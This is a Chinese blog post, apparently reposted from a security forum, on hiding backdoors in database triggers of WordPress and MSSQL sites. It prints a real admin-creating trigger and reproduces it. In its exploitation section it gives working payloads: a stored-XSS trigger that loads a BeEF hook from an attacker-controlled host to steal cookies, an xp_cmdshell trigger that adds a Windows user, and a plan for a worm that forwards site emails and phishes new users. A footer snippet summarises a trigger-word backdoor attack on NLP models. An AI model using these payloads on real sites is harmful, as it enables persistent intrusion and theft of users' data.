后门学习—数据库触发器后门

已于 2023-08-17 16:46:37 修改
阅读量45 收藏
点赞数 2
文章标签: 数据库 学习 oracle
于 2023-08-17 16:44:21 首次发布
原文链接:https://bbs.ichunqiu.com/thread-63557-1-1.html
版权

本篇精选文章作者fatmo,本文属i春秋原创奖励计划,未经许可禁止转载。

原文链接:https://bbs.ichunqiu.com/thread-63557-1-1.html


声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。
 

引言

最近我在WordPress的提问板块中发现了一个有趣的问题:提问者在帮助朋友处理一个被入侵的WordPress网站时,删除了多余的管理员账户。然而,不久之后,这个管理员账户又出现了。

当提问者进行进一步检查时,发现了网站数据库中的一个触发器。这个触发器的作用是,当有评论的内容包含特定字符串"are you struggling to get comments on your blog?"时,触发器会在数据库中创建一个新的管理员账户。

BEGIN
     IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
         SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
         SET @nextWpUsersID = @lastInsertWpUsersId + 1;
         INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
     END IF;
 END

提问者在网站的三个不同数据库中找到了这个触发器,这表明这个触发器是入侵者留下的一个后门。

这个问题引起了我的兴趣,数据库触发器可以神不知鬼不觉的创建管理员账户,但它的潜力远不止此,与网站特性相结合,它可以做很多事情

DB Trigger后门介绍

DB Trigger

DB Trigger,也被称为数据库触发器,是自动响应或激活某个事件(如INSERT,DELETE,UPDATE)的一个存储过程(Stored Procedure)。这些事件被定义在特定的数据库表(Table)上。当在表上触发指定的事件时,数据库触发器将被自动执行。

几个DB Trigger常见的用例:

  1. 审计: 触发器可以被用来记录对数据库表的更改。例如,如果某个用户试图修改或删除记录,触发器可以在审计表中自动创建一条记录,指明谁执行了操作,何时执行了操作,以及操作的细节。
  2. 数据验证:触发器可以被用来在数据库级别验证数据。例如,如果应用程序试图输入一个无效的数据,触发器可以阻止这个操作,并回滚事务。
  3. 自动化任务:触发器可以被用来自动执行数据库中的任务。例如,每当在表中插入新记录时,触发器可以自动更新相关联的另一张表。
  4. 跟踪更改:如果你希望每次表更新时都记录一下更改的内容,触发器可以帮助实现这一点。

给出审计用例下的Trigger SQL代码:

CREATE TRIGGER products_after_update 
AFTER UPDATE ON products
FOR EACH ROW
BEGIN
   INSERT INTO audit_log (action, action_date, executed_by, product_id) 
   VALUES('Update', NOW(), CURRENT_USER(), OLD.product_id);
END;

DB Trigger后门

拥有CREATE Trigger权限的攻击者,可以在数据库中创建触发器,触发条件只有攻击者自己知道(比如发布一条包含特殊字符串的评论),数据库在触发后,执行指定的操作(比如创建特定管理员账号供管理员登陆)。

引言中的SQL代码就是一个典型的DB Trigger后门,这个后门的内容是:当有人发表的评论内容包含特定字符串"are you struggling to get comments on your blog?"时,触发器会在数据库中创建一个新的特定的管理员账户。

BEGIN
     IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
         SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
         SET @nextWpUsersID = @lastInsertWpUsersId + 1;
         INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
     END IF;
 END

后门利用

引言中的例子证明了这个后门的可行性,为了学习这个后门的利用,我们先在本地环境复现引言中的例子,然后扩展这个后门的更多用法,最后分享想法与总结。

问题复现

安装wordpress

  1. 新建文件docker-compose.yml,写入以下内容:
version: '3'

services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: your_mysql_root_password
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress

  wordpress:
    depends_on:
      - db
    image: wordpress:latest
    ports:
      - 8080:80
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_DB_NAME: wordpress

volumes:
  db_data:
  1. 在相同目录下,执行:
docker-compose up -d

  1. 随后访问服务器的8080端口,按照指示安装wordpress

  1. 安装完成

配置MySQL打印日志

  1. 查看MySQL容器ID,这里是46d开头
docker ps

  1. 把MySQL配置文件复制到本机修改
docker cp 46d:/etc/my.conf ./my.cnf

  1. 添加打印SQL日志的配置
log_output = FILE
general_log = 1
general_log_file = /var/lib/mysql/general.log

  1. 再把文件传回去
docker cp ./my.cnf 46d:/etc/my.cnf
  1. 重启MySQL容器使配置生效
docker restart 46d

  1. 进入容器,追踪日志/var/lib/mysql/general.log,随便制造几个请求,我们就可以看到wordpress执行的所有SQL指令,这对我们之后的研究很有帮助
cd /var/lib/mysql
tail -f general.log

复现创建管理员的触发器后门

  1. 我们首先看一下,发表一个评论,会执行怎样的SQL指令。为了防止我们发表评论的SQL在海量的SQL请求中淹没,我们以“Hello World”作为标志,筛选所有具有Hello World的SQL指令
tail -f general.log | grep "Hello World"

  1. 点击发布,我们就拿到了发表评论的SQL指令
bash-4.2# tail -f general.log | grep "Hello World"
2023-08-12T06:13:10.947100Z           62 Query        SELECT comment_ID FROM wp_comments WHERE comment_post_ID = 6 AND comment_parent = '0' AND comment_approved != 'trash' AND ( comment_author = 'wordpress' AND comment_author_email = 'wordpress@wp.com' ) AND comment_content = 'Hello World' LIMIT 1
2023-08-12T06:13:11.000667Z           62 Query        INSERT INTO `wp_comments` (`comment_post_ID`, `comment_author_IP`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES (6, '192.168.153.1', 'wordpress', 'wordpress@wp.com', 'http://192.168.153.147:8080', '2023-08-12 14:13:10', '2023-08-12 06:13:10', 'Hello World', 0, '1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', 'comment', 0, 1)

  1. 有两个SQL命令,我们关注插入数据库的命令:
INSERT INTO `wp_comments` (`comment_post_ID`, `comment_author_IP`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES (6, '192.168.153.1', 'wordpress', 'wordpress@wp.com', 'http://192.168.153.147:8080', '2023-08-12 14:13:10', '2023-08-12 06:13:10', 'Hello World', 0, '1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', 'comment', 0, 1)
  1. 现在,我们要复现一下引言中的后门:当攻击者发表一个内容包含“Hello”的评论时,创建一个管理员账户
  2. 我们首先需要获取创建管理员的SQL指令,进入后台,添加管理员用户,然后去日志查看执行的SQL指令

bash-4.2# tail -f general.log | grep "a666"
2023-08-12T06:05:48.678173Z           52 Query        SELECT * FROM wp_users WHERE user_login = 'a666' LIMIT 1
2023-08-12T06:05:48.678471Z           52 Query        SELECT * FROM wp_users WHERE user_email = 'a666@a.cc' LIMIT 1
2023-08-12T06:05:48.693036Z           52 Query        SELECT * FROM wp_users WHERE user_login = 'a666' LIMIT 1
2023-08-12T06:05:48.693567Z           52 Query        SELECT ID FROM wp_users WHERE user_nicename = 'a666' AND user_login != 'a666' LIMIT 1
2023-08-12T06:05:48.694158Z           52 Query        SELECT * FROM wp_users WHERE user_email = 'a666@a.cc' LIMIT 1
2023-08-12T06:05:48.695324Z           52 Query        INSERT INTO `wp_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC8VGj7dIkFdu1K.Y8kovNXNR3IiLR1', 'a666', 'a666@a.cc', 'http://a666', '2023-08-12 06:05:48', '', 'a, a666', 'a666')
2023-08-12T06:05:48.697495Z           52 Query        INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (2, 'nickname', 'a666')
2023-08-12T06:05:48.698825Z           52 Query        INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (2, 'first_name', 'a666')
  1. 获取到添加管理员实际执行了这条语句:
INSERT INTO `wp_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC8VGj7dIkFdu1K.Y8kovNXNR3IiLR1', 'a666', 'a666@a.cc', 'http://a666', '2023-08-12 06:05:48', '', 'a, a666', 'a666')
  1. 前置信息已经足够,我们写入触发器
CREATE TRIGGER comment_backdoor
AFTER INSERT ON wordpress.wp_comments
FOR EACH ROW
BEGIN
  IF NEW.comment_content LIKE '%Hello%' THEN
      SET @lastInsertWpUsersId = (SELECT MAX(id) FROM wordpress.wp_users);
      SET @nextWpUsersID = @lastInsertWpUsersId + 1;
      INSERT INTO `wp_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC8VGj7dIkFdu1K.Y8kovNXNR3IiLR1', 'a666', 'a666@a.cc', 'http://a666', '2023-08-12 06:05:48', '', 'a, a666', 'a666');
      INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (@nextWpUsersID, 'nickname', 'a666');
      INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (@nextWpUsersID, 'first_name', 'a666');
  END IF;
END;

  1. 我们再发一个评论,评论内容包含Hello,看是否创建了用户

  1. 评论发出,新建管理员账号,复现成功

深入利用

与XSS相结合

我们可以创建这样一个触发器:当用户发表评论时,使用XSS Payload拼接用户的评论,从而实现存储型XSS。这样做有两点好处:

  1. XSS Payload是在用户输入至数据库后才被拼接的,可以绕过Waf等防护。
  2. 这是一个在任意数据输入处都可以埋点的存储型XSS,可以由任何用户触发,危害范围广

下面我们使用上文中的环境继续测试,验证这个想法是否可行:

  1. 创建触发器,在用户发表评论时,弹出提示框:
CREATE TRIGGER comment_alert
BEFORE INSERT ON wp_comments
FOR EACH ROW
BEGIN
    SET NEW.comment_content = CONCAT(NEW.comment_content, '<script>alert("backdoor!")</script>');
END;

  1. 发表一条评论,成功弹窗

  1. ok,初步验证成功,我们直接上beef

  1. 改一下我们的触发器,改成载入我们的beef Hook文件
CREATE TRIGGER comment_alert
BEFORE INSERT ON wp_comments
FOR EACH ROW
BEGIN
    SET NEW.comment_content = CONCAT(NEW.comment_content, '<script src="http://192.168.153.147:3000/hook.js"></script>');
END;
  1. 随便发一条评论,可以看到我们的受害者已经上线

  1. 拿到了包括Cookies在内的受害者信息

  1. 再用Beef随便玩玩,把页面里的所有超链接改成百度

  1. 获取受害者的位置

  1. 内网探测,还有作为僵尸节点进行DDos,诱导受害者下载木马并执行等

与xp_cmdshell结合

我们都知道MSSQL的xp_cmdshell可以执行系统命令,如果MSSQL开启了xp_cmdshell或者攻击者打开了xp_cmdshell功能,那么构造一个调用xp_cmdshell的触发器,就可以实现DB Trigger后门直接执行系统命令。例子如下:

CREATE TRIGGER backdoorTrigger
ON [master]
FOR Create_Login
AS
EXEC xp_cmdshell 'cmd.exe /c net user Admin123 Admin123456 /add'

想法:XSS蠕虫

前文中我们已经证实了触发器后门可以与XSS相结合,假设目标网站存在CSRF漏洞。再结合前文的XSS漏洞,两个低危漏洞相结合,就可以实现XSS蠕虫,产生广泛的影响。

  1. 假设WordPress的Email插件存在CSRF,那么我们监视邮件库,在邮件请求ID+1时调用JS代码,把邮件内容拷贝一份发送到攻击者邮箱。就可以监听站点发出的所有Email。
  2. 再狂野一点,监听wp用户表,当有新用户创建时,马上发送一封Email给新用户。提示用户注册后需要点击链接后才能正常使用网站,链接背后的内容可以自由发挥。
  3. 文章虽然以WordPress为例展开讲解,但是不论是DB Trigger Backdoor、XSS还是CSRF,都是通用的。现实中就发生了多起XSS蠕虫造成严重影响的事件,比如社交网站的关注功能存在CSRF,那么就可以让一个人一天内涨上百万粉丝。应该根据实际情况构造不同的攻击思路。

总结

我们从一个实际的例子入手,本地复现了该后门。随后,我们将此后门与XSS和xp_cmdshell想结合,证明了这个后门在广度(XSS)和深度(xp_cmdshell)上都有更大的利用潜力。

而且,DB Trigger是一个在安全中及其容易被忽视的功能(实际运维应用场景也不是很多),因此在后门排查中极易被忽视。起码,目前WordPress中最流行的安全插件wordfence还没有检测DB Trigger的功能。

未知攻焉知防,从攻击者的角度入手,了解到了DB Trigger后门的隐蔽性和危害,在安全建设工作中才会覆盖到这个容易被忽视的隐患。

参考链接

SQL Triggers in Website Backdoors

Re-Hacked via DB-Trigger | WordPress.org

Persistence in WordPress using backdoors in SQL | Tarlogic

mssql触发器后门:安全隐患究竟何在(mssql 触发器 后门)-数据库运维技术服务

h0XT0nh0u
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
联邦学习后门攻击案例
08-18
后门攻击是联邦学习中比较常见的一种攻击方式,攻击者意图让模型对具有某种特定特征的数据做出错误的判断,但模型不会对主任务产生影响,本节我们将讨论一种在横向联邦场景下的后门攻击行为。 这里我们介绍两种带有...
论文精读:BITE — 使用迭代触发器注入的文本后门攻击
weixin_44757003的博客
08-30 408
BITE是一种后门攻击,它毒害训练数据,在目标标签和一组“触发词”之间建立强相关性。这些触发词被迭代地识别并通过自然词级扰动注入到目标标签实例中。有毒的训练数据指示受害者模型在包含触发词的输入上预测目标标签,形成后门。我们进一步提出了一种基于潜在触发词去除的DeBITE防御方法,该方法在防御BITE方面优于现有方法,并且可以很好地推广到处理其他后门攻击。在基于中毒的后门攻击中,攻击者通过篡改模型所训练的数据将后门注入到NLP模型中。
后门攻击经典背景文献(综述)
weixin_43999137的博客
10-06 2880
总结 攻击在各个场景都有体现,比如外包场景、迁移学习、联邦学习等,主要集中于前两个前景,联邦学习的攻击还有待发展。 攻击手段都集中在带触发器输入的构造上,无论是直接设计,还是使用目标模型的参数进行优化得到的触发器,本质上都是构造更加鲁棒的触发器输入使得模型在训练过程中生成后门,最终造成威胁。 接下来的工作,应该集中在原来的场景下去设计更鲁棒的触发器输入或在新的场景下提出适合的触发器输入。 BadNets GU T, DOLAN-GAVITT B, GARG S. Badnets: Identifying
mysql 5.x触发器后门
weixin_34279246的博客
12-28 138
触发器参考资料:http://blog.csdn.net/lazy_p/archive/2009/12/25/5076114.aspx 基本语法: CREATE TRIGGER <触发器名称> { BEFORE | AFTER } <– { INSERT | UPDATE | DELETE } ON <表名称> FOR EACH R...
MySQL之触发器
小异常的博客
10-21 486
由于工作需要,不得不研究一下 MySQL中的触发器,不过我先声明一下,触发器这种东西只有在并发不高的项目或管理系统中使用,如果是面向用户的高并发应用,都不要使用。 本篇博客主要讲解触发器的基本使用,会以几个简单的小案例讲解,可以暂时应付工作的需要。而我们一般开发尽量不要去使用这个东西,因为它本身没有提升多少性能,只是从代码上来说,可能很容易实现业务,所以我的观点是 尽可以的不要去使用触发器
nfine去后门版和数据库说明
04-30
nfine去后门版和数据库说明,节约程序员时间,去除60%业务代码编写
404页面中怎么隐藏后门
07-04
打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404页面隐藏后门打造404...
Webshell后门查杀
12-20
Webshell相关问题进行后门查杀,处理相关问题。
Metasploit可执行后门.doc
12-01
Metasploit可执行后门.doc
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。
最新发布
XING的博客
05-03 482
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。数据库作为系统数据储存平台,实现了基于B/S结构的Web系统。界面简洁,操作简单。采用M(model)V(view)C(controller)三层体系结构,通过。
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 808
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
【课堂练习】
JacksonLeo的博客
04-29 465
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
力扣数据库题库学习(4.28日)--1587. 银行账户概要 II
Jesse_Kyrie的博客
04-28 239
对于力扣题1587. 银行账户概要 II的解答,提供解题思路与解题方法,知识点为:1. GROUP BY 2. SUM 3. LEFT JOIN 4. HAVING
2.Neo4j的搭建启动
qq_36352889的博客
04-28 598
Graph Database 图数据库
tableau如何传参数到MySQL数据库
lcl17779740668的博客
04-28 286
tableau如何传参数到MySQL数据库
java线上问题排查之磁盘和网络查看分析(二)
wayne_youlu的博客
04-30 328
overflowed 标识全连接队列溢出的次数,最前面是0,标识没有队列溢出的情况,网络环境正常。来查看网络是否连接。如果出现下图内容,则证明网络已经连接。
openlayers加载瓦片地图并手动标记坐标点
qq_38196449的博客
04-28 398
这里面有个注释掉的方法,读者可以打开试试,其实就是标记的时候打印经纬度,一般这个值我们都用来存储数据库中。将ol.js、ol.css放在根目录下,当然还有你的瓦片地图也放在根目录下。创建一个项目,普通原生前端项目就行。marker.png是标记坐标点的。
MySQL数据库练习(6)
a1677179的博客
04-29 246
MySQL数据库练习(6)
buuctfwebshell后门
07-27
回答: 根据提供的引用内容,buuctfwebshell后门可能是一个存在于buuctf网站中的后门。具体的操作和细节需要进一步的信息才能确定。引用\[1\]中提到了一个HTTP请求,其中包含了一个名为admina的参数和一个名为adminb...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值